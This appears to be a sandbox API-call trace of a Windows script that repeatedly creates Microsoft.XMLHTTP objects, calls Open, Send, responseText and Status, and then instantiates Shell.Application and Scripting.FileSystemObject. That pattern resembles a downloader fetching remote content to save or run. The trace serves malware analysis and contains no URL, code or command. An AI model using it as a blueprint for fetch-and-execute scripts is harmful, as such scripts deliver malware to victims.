	[0378.425] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0378.425] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0378.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7488) returned 0x0
	[0378.425] ??2@YAPEAX_K@Z () returned 0x62f310
	[0378.425] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7488, pUnkSite=0x62f310) 
	[0378.425] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0378.425] XMLHTTPRequest:IUnknown:Release (This=0x49c7488) returned 0x0
	[0378.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0378.425] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0378.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0378.425] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0378.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0378.425] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0378.425] SysStringLen (param_1=0x0) returned 0x0
	[0378.425] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0378.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0378.426] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0378.426] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0378.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0378.426] ??2@YAPEAX_K@Z () returned 0x62f330
	[0378.426] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0378.426] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0378.426] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0378.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0378.426] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0378.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0378.426] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0378.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0378.426] longjmp () 
	[0378.426] longjmp () 
	[0378.426] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0378.426] SysStringLen (param_1=0x0) returned 0x0
	[0378.426] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0378.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0378.427] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0378.427] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0378.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0378.427] ??2@YAPEAX_K@Z () returned 0x62f310
	[0378.427] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0378.427] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0378.427] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0378.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0378.427] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0378.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0378.427] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0378.427] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0378.427] longjmp () 
	[0378.428] longjmp () 
	[0378.428] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0378.428] SysStringLen (param_1=0x0) returned 0x0
	[0378.428] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0378.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0378.428] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0378.428] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0378.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0378.428] ??2@YAPEAX_K@Z () returned 0x62f330
	[0378.428] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f330) 
	[0378.428] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0378.428] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0378.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0378.428] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0378.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0378.428] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0378.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0378.429] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0378.429] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0378.429] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0379.942] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0379.943] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0379.943] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0379.943] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0379.943] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0379.943] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0379.943] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0379.943] SysStringLen (param_1=0x0) returned 0x0
	[0379.943] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0379.943] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0379.943] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0379.944] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0379.944] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0379.944] ??2@YAPEAX_K@Z () returned 0x62f350
	[0379.944] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0379.944] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0379.944] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0379.944] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0379.944] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0379.944] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0379.944] SysStringLen (param_1=0x0) returned 0x0
	[0379.944] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0379.947] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0379.947] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0379.947] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0379.947] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0379.947] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0379.947] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0380.399] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0380.399] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0380.399] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0380.401] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0380.401] SysStringLen (param_1=0x0) returned 0x0
	[0380.401] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0380.401] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
